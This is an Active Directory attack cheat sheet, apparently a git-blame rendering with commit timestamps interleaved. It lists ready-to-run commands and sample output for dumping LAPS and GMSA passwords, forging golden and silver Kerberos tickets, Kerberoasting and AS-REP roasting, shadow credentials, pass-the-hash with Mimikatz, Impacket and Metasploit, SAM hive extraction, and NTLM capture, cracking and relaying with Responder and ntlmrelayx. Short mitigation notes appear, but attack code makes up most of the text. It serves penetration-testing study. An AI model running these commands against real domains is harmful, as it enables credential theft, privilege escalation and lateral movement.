2021-06-28 20:08:06 +00:00
2019-06-23 22:21:39 +00:00
or dump the Active Directory and `grep` the content.
```powershell
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
```
2018-05-20 20:10:33 +00:00
2021-03-24 11:44:35 +00:00
### Reading GMSA Password
> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed.
#### GMSA Attributes in the Active Directory
* **msDS-GroupMSAMembership** (PrincipalsAllowedToRetrieveManagedPassword) - stores the security principals that can access the GMSA password.
* **msds-ManagedPassword** - This attribute contains a BLOB with password information for group-managed service accounts.
* **msDS-ManagedPasswordId** - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
* **msDS-ManagedPasswordInterval** - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
#### Extract NT hash from the Active Directory
* GMSAPasswordReader (C#)
```ps1
# https://github.com/rvazarkar/GMSAPasswordReader
GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
```
2021-04-10 15:58:05 +00:00
* [gMSADumper (Python) ](https://github.com/micahvandeusen/gMSADumper )
```powershell
# https://github.com/micahvandeusen/gMSADumper
python3 gMSADumper.py -u User -p Password1 -d domain.local
```
2021-03-24 11:44:35 +00:00
* Active Directory Powershell
```ps1
$gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword
```
* [gMSA_Permissions_Collection.ps1 ](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1 ) based on Active Directory PowerShell module
2020-12-20 20:45:41 +00:00
### Reading LAPS Password
> Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure.
#### Determine if LAPS is installed
```ps1
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll'
Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
```
#### Extract LAPS password
> The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users
2021-06-24 13:26:05 +00:00
* adsisearcher (native binary on Windows 8+)
```powershell
([adsisearcher]"(& (objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties}
([adsisearcher]"(& (objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties}
```
2021-03-24 11:44:35 +00:00
* CrackMapExec
```powershell
crackmapexec smb 10.10.10.10 -u user -H 8846f7eaee8fb117ad06bdd830b7586c -M laps
```
2020-12-20 20:45:41 +00:00
* Powerview
```powershell
PS > Import-Module .\PowerView.ps1
PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
```
2021-03-24 21:26:23 +00:00
* LAPSToolkit - https://github.com/leoloobeek/LAPSToolkit
```powershell
$ Get-LAPSComputers
ComputerName Password Expiration
------------ -------- ----------
exmaple.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18
$ Find-LAPSDelegatedGroups
$ Find-AdmPwdExtendedRights
```
2020-12-20 20:45:41 +00:00
* ldapsearch
```powershell
ldapsearch -x -h -D "@" -w -b "dc=< >,dc=< >,dc=< >" "(& (objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
```
* LAPSDumper - https://github.com/n00py/LAPSDumper
```powershell
python laps.py -u user -p password -d domain.local
python laps.py -u user -p e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c -d domain.local -l dc01.domain.local
```
* Powershell AdmPwd.PS
```powershell
foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
```
2019-08-18 20:24:48 +00:00
### Pass-the-Ticket Golden Tickets
2018-08-12 21:30:22 +00:00
2019-08-18 20:24:48 +00:00
Forging a TGT require the krbtgt NTLM hash
2018-05-08 20:11:36 +00:00
2019-08-18 20:24:48 +00:00
> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used.
#### Using Mimikatz
2018-08-12 21:30:22 +00:00
2018-05-05 15:32:19 +00:00
```powershell
2019-08-18 20:24:48 +00:00
# Get info - Mimikatz
2018-05-05 15:32:19 +00:00
lsadump::lsa /inject /name:krbtgt
2021-04-21 20:27:07 +00:00
lsadump::lsa /patch
lsadump::trust /patch
lsadump::dcsync /user:krbtgt
2018-05-05 15:32:19 +00:00
2019-08-18 20:24:48 +00:00
# Forge a Golden ticket - Mimikatz
2018-07-15 09:06:43 +00:00
kerberos::purge
2018-05-05 15:32:19 +00:00
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
kerberos::tgt
```
2019-08-18 20:24:48 +00:00
#### Using Meterpreter
2018-08-12 21:30:22 +00:00
```powershell
2019-08-18 20:24:48 +00:00
# Get info - Meterpreter(kiwi)
2018-05-05 15:32:19 +00:00
dcsync_ntlm krbtgt
dcsync krbtgt
2019-08-18 20:24:48 +00:00
# Forge a Golden ticket - Meterpreter
2018-05-05 15:32:19 +00:00
load kiwi
golden_ticket_create -d < domainname > -k < nthashof krbtgt > -s < SID without le RID > -u < user_for_the_ticket > -t < location_to_store_tck >
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
kerberos_ticket_purge
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
kerberos_ticket_list
```
2019-08-18 20:24:48 +00:00
#### Using a ticket on Linux
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
```powershell
2019-08-18 20:24:48 +00:00
# Convert the ticket kirbi to ccache with kekeo
2018-07-08 18:03:40 +00:00
misc::convert ccache ticket.kirbi
2018-05-08 20:11:36 +00:00
2019-08-18 20:24:48 +00:00
# Alternatively you can use ticketer from Impacket
2018-07-08 18:03:40 +00:00
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
2018-07-15 09:06:43 +00:00
ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519
./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519
2018-07-08 18:03:40 +00:00
export KRB5CCNAME=/home/user/ticket.ccache
cat $KRB5CCNAME
2019-08-18 20:24:48 +00:00
# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
2019-04-03 08:45:45 +00:00
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
2018-07-08 18:03:40 +00:00
```
2019-08-18 20:24:48 +00:00
If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo` .
```powershell
root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
```
2020-06-18 09:55:48 +00:00
Mitigations:
* Hard to detect because they are legit TGT tickets
* Mimikatz generate a golden ticket with a life-span of 10 years
2019-08-18 20:24:48 +00:00
### Pass-the-Ticket Silver Tickets
2018-08-12 21:30:22 +00:00
2020-12-22 22:16:40 +00:00
Forging a TGS require machine account password (key) or NTLM hash of the service account.
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
```powershell
2019-08-18 20:24:48 +00:00
# Create a ticket for the service
mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
2018-05-05 15:32:19 +00:00
2019-08-18 20:24:48 +00:00
# Examples
mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
# Then use the same steps as a Golden ticket
mimikatz $ misc::convert ccache ticket.kirbi
root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
2018-07-08 18:03:40 +00:00
```
2020-08-09 17:25:03 +00:00
Interesting services to target with a silver ticket :
| Service Type | Service Silver Tickets | Attack |
|---------------------------------------------|------------------------|--------|
| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` |
| PowerShell Remoting | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
| WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` |
| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` |
| LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` |
| Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | / |
2020-06-18 09:55:48 +00:00
Mitigations:
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
2019-11-04 20:43:44 +00:00
### Kerberoasting
2018-08-12 21:30:22 +00:00
2018-12-25 18:38:37 +00:00
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
2021-04-21 20:27:07 +00:00
Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
2018-12-14 23:51:33 +00:00
2021-04-21 20:27:07 +00:00
* `GetUserSPNs` from Impacket Suite
```powershell
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
2018-05-08 20:11:36 +00:00
2021-04-21 20:27:07 +00:00
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
2018-05-05 15:32:19 +00:00
2021-04-21 20:27:07 +00:00
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11
2019-06-16 21:45:52 +00:00
2021-04-21 20:27:07 +00:00
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2
```
2021-01-29 21:10:22 +00:00
2021-04-21 20:27:07 +00:00
* CrackMapExec Module
```powershell
2021-06-28 20:08:06 +00:00
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt
LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False)
LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9
2021-04-21 20:27:07 +00:00
```
2021-01-29 21:10:22 +00:00
2021-04-21 20:27:07 +00:00
* [Rubeus ](https://github.com/GhostPack/Rubeus )
```powershell
2021-07-26 19:25:56 +00:00
# Stats
Rubeus.exe kerberoast /stats
------------------------------------- ----------------------------------
| Supported Encryption Type | Count | | Password Last Set Year | Count |
------------------------------------- ----------------------------------
| RC4_HMAC_DEFAULT | 1 | | 2021 | 1 |
------------------------------------- ----------------------------------
2021-04-21 20:27:07 +00:00
# Kerberoast (RC4 ticket)
2021-07-26 19:25:56 +00:00
Rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
2019-06-16 21:45:52 +00:00
2021-04-21 20:27:07 +00:00
# Kerberoast (AES ticket)
# Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.
Rubeus.exe kerberoast /tgtdeleg
2020-12-08 13:31:01 +00:00
2021-04-21 20:27:07 +00:00
# Kerberoast (RC4 ticket)
# The tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted.
Rubeus.exe kerberoast /rc4opsec
```
2020-12-08 13:31:01 +00:00
2021-04-21 20:27:07 +00:00
* [PowerView ](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 )
```powershell
Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
```
2019-11-14 22:26:13 +00:00
2021-04-21 20:27:07 +00:00
* [bifrost ](https://github.com/its-a-feature/bifrost ) on **macOS** machine
```powershell
./bifrost -action asktgs -ticket doIF< ...snip... > QUw= -service host/dc1-lab.lab.local -kerberoast true
```
2019-11-14 22:26:13 +00:00
2021-08-10 21:00:19 +00:00
* [targetedKerberoast ](https://github.com/ShutdownRepo/targetedKerberoast )
```powershell
# for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute),
# print the "kerberoast" hash, and delete the temporary SPN set for that operation
targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]
```
2021-01-29 21:10:22 +00:00
Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23` )
| Mode | Description |
|-------|--------------|
| 13100 | Kerberos 5 TGS-REP etype 23 (RC4) |
| 19600 | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) |
| 19700 | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) |
2018-12-14 23:51:33 +00:00
```powershell
2020-05-28 09:19:16 +00:00
./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt
./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt
2018-12-14 23:51:33 +00:00
```
2021-01-29 21:10:22 +00:00
2019-11-04 20:43:44 +00:00
Mitigations:
2020-06-18 09:55:48 +00:00
* Have a very long password for your accounts with SPNs (> 32 characters)
2019-11-04 20:43:44 +00:00
* Make sure no users have SPNs
2019-03-24 12:16:23 +00:00
### KRB_AS_REP Roasting
2021-04-21 20:27:07 +00:00
> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
2019-03-24 12:16:23 +00:00
2021-04-21 20:27:07 +00:00
**Requirements**:
- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
2019-03-24 12:16:23 +00:00
2021-04-21 20:27:07 +00:00
* [Rubeus ](https://github.com/GhostPack/Rubeus )
```powershell
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
[*] Action: AS-REP roasting
[*] Target User : TestOU3user
[*] Target Domain : testlab.local
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
```
2019-03-24 12:16:23 +00:00
2021-04-21 20:27:07 +00:00
* `GetNPUsers` from Impacket Suite
```powershell
$ python GetNPUsers.py htb.local/svc-alfresco -no-pass
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7a[...]e776b4
2019-03-24 12:16:23 +00:00
2021-04-21 20:27:07 +00:00
# extract hashes
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
```
2019-08-18 20:24:48 +00:00
2021-04-21 20:27:07 +00:00
* CrackMapExec Module
```powershell
2021-06-28 20:08:06 +00:00
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt
LDAP 10.0.2.11 389 dc01 $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5
2021-04-21 20:27:07 +00:00
```
2019-08-18 20:24:48 +00:00
2021-04-21 20:27:07 +00:00
Using `hashcat` or `john` to crack the ticket.
2019-08-18 20:24:48 +00:00
```powershell
2021-04-21 20:27:07 +00:00
# crack AS_REP messages with hashcat
2019-08-18 20:24:48 +00:00
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
2020-12-17 07:56:58 +00:00
root@windows:hashcat$ hashcat64.exe -m 18200 '< AS_REP-hash > ' -a 0 c:\wordlists\rockyou.txt
2021-04-21 20:27:07 +00:00
# crack AS_REP messages with john
C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast
2019-03-24 12:16:23 +00:00
```
2021-04-21 20:27:07 +00:00
**Mitigations**:
2020-06-18 09:55:48 +00:00
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
2021-06-24 13:26:05 +00:00
### Shadow Credentials
Requirements :
* Domain Controller on Windows Server 2016
* PKINIT Kerberos authentication
* An account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object
Add **Key Credentials** to the attribute **msDS-KeyCredentialLink** of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.
```powershell
# https://github.com/eladshamir/Whisker
Whisker.exe list /target:computername$
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b
# Removes a key credential from the target object specified by a DeviceID GUID.
```
2018-08-12 21:30:22 +00:00
### Pass-the-Hash
2019-07-26 12:24:58 +00:00
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’ t the built-in RID 500.
2018-08-12 21:30:22 +00:00
2021-07-12 18:45:16 +00:00
* Metasploit
```powershell
use exploit/windows/smb/psexec
set RHOST 10.2.0.3
set SMBUser jarrieta
set SMBPass nastyCutt3r
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
set PAYLOAD windows/meterpreter/bind_tcp
run
shell
```
* CrackMapExec
```powershell
cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
```
* Impacket suite
```powershell
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
```
* Windows RDP and mimikatz
```powershell
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863
sekurlsa::pth /user:< user name > /domain:< domain name > /ntlm:< the users ntlm hash > /run:"mstsc.exe /restrictedadmin"
```
2018-05-05 15:32:19 +00:00
2020-09-18 19:21:55 +00:00
You can extract the local **SAM database** to find the local administrator hash :
2019-12-17 20:13:59 +00:00
```powershell
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```
2018-05-05 15:32:19 +00:00
### OverPass-the-Hash (pass the key)
2018-08-12 21:30:22 +00:00
2021-07-04 11:32:32 +00:00
In this technique, instead of passing the hash directly, we use the NTLM hash of an account to request a valid Kerberost ticket (TGT).
2019-08-18 20:24:48 +00:00
#### Using impacket
2018-08-12 21:30:22 +00:00
```powershell
2019-08-18 20:24:48 +00:00
root@kali:impacket-examples$ python ./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
root@kali:impacket-examples$ export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
root@kali:impacket-examples$ python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
2018-05-08 20:11:36 +00:00
2018-08-12 21:30:22 +00:00
also with the AES Key if you have it
2019-08-18 20:24:48 +00:00
root@kali:impacket-examples$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
2018-05-08 20:11:36 +00:00
ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
klist
```
2018-05-05 15:32:19 +00:00
2019-08-18 20:24:48 +00:00
#### Using Rubeus
```powershell
2021-07-04 11:32:32 +00:00
# Request a TGT as the target user and pass it into the current session
# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
# More stealthy variant, but requires the AES256 hash
.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt
# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
2019-08-18 20:24:48 +00:00
```
2021-09-06 18:58:44 +00:00
### Capturing and cracking Net-NTLMv1/NTLMv1 hashes
> Net-NTLM (NTLMv1) hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash.
2021-09-07 08:22:39 +00:00
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication** . This uses the outdated encryption method DES to protect the NT/LM Hashes.
2021-09-06 18:58:44 +00:00
2021-09-07 12:48:57 +00:00
**Requirements**:
2021-09-06 18:58:44 +00:00
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
2021-09-07 12:48:57 +00:00
**Exploitation**:
2021-09-06 18:58:44 +00:00
* Capturing using Responder: Edit the /etc/responder/Responder.conf file to include the magical **1122334455667788** challenge
```ps1
HTTPS = On
DNS = On
LDAP = On
...
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788
```
* Fire Responder: `responder -I eth0 --lm`
2021-09-07 08:22:39 +00:00
* Force a callback:
```ps1
PetitPotam.exe Responder-IP DC-IP # Patched around August 2021
PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users
```
2021-09-16 15:45:29 +00:00
* If you got some `NTLMv1 hashes` , you need to format them to submit them on [crack.sh ](https://crack.sh/netntlm/ )
2021-09-06 18:58:44 +00:00
```ps1
username::hostname:response:response:challenge -> NTHASH:response
NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972
```
2021-09-16 15:45:29 +00:00
* Or crack them with Hashcat / John The Ripper
```ps1
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
```
2021-09-07 08:22:39 +00:00
* Now you can DCSync using the Pass-The-Hash with the DC machine account
2021-09-06 18:58:44 +00:00
:warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used.
2021-09-07 08:22:39 +00:00
**Mitigations**:
* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM`
2021-09-06 18:58:44 +00:00
### Capturing and cracking Net-NTLMv2/NTLMv2 hashes
2018-12-25 19:35:39 +00:00
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR` , `MDNS` and `NETBIOS` requests on the network.
2021-04-21 20:27:07 +00:00
```powershell
# https://github.com/lgandx/Responder
$ sudo ./Responder.py -I eth0 -wfrd -P -v
2018-12-25 19:35:39 +00:00
2021-04-21 20:27:07 +00:00
# https://github.com/Kevin-Robertson/InveighZero
PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N]
2018-12-25 19:35:39 +00:00
2021-04-21 20:27:07 +00:00
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1
PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y – mDNS Y – Proxy Y -MachineAccounts Y
2018-12-25 19:35:39 +00:00
```
2021-09-16 15:45:29 +00:00
Crack the hashes with Hashcat / John The Ripper
```ps1
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt
```
2021-09-06 18:58:44 +00:00
2021-03-25 17:25:02 +00:00
### Man-in-the-Middle attacks & relaying
2018-12-25 19:35:39 +00:00
2019-10-20 20:09:36 +00:00
NTLMv1 and NTLMv2 can be relayed to connect to another machine.
| Hash | Hashcat | Attack method |
|---|---|---|
| LM | 3000 | crack/pass the hash |
| NTLM/NTHash | 1000 | crack/pass the hash |
| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
2021-04-21 20:27:07 +00:00
Crack the hash with `hashcat` .
```powershell
hashcat -m 5600 -a 0 hash.txt crackstation.txt
```
2019-10-20 20:09:36 +00:00
#### MS08-068 NTLM reflection
NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.
> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’ s own credentials.
* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068
```powershell
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets
```
2019-11-14 22:26:13 +00:00
#### SMB Signing Disabled and IPv4
2019-10-20 20:09:36 +00:00
2021-04-21 20:27:07 +00:00
If a machine has `SMB signing` :`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning**
2018-12-25 19:35:39 +00:00
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off` .
2019-10-20 20:09:36 +00:00
```powershell
[Responder Core]
; Servers to start
...
SMB = Off # Turn this off
HTTP = Off # Turn this off
```
2018-12-25 19:35:39 +00:00
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing` :`disabled`.
2021-03-25 17:25:02 +00:00
3. Run `python Responder.py -I <interface_card>`
4. Use a relay tool such as `ntlmrelayx` or `MultiRelay`
- `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list.
- `python MultiRelay.py -t <target_machine_IP> -u ALL`
2019-10-20 20:09:36 +00:00
5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
```powershell
2021-03-25 17:25:02 +00:00
$ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support
2019-10-20 20:09:36 +00:00
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> socks
Protocol Target Username Port
-------- -------------- ------------------------ ----
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
2021-03-25 17:25:02 +00:00
# You might need to select a target with "-t"
impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support
impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support
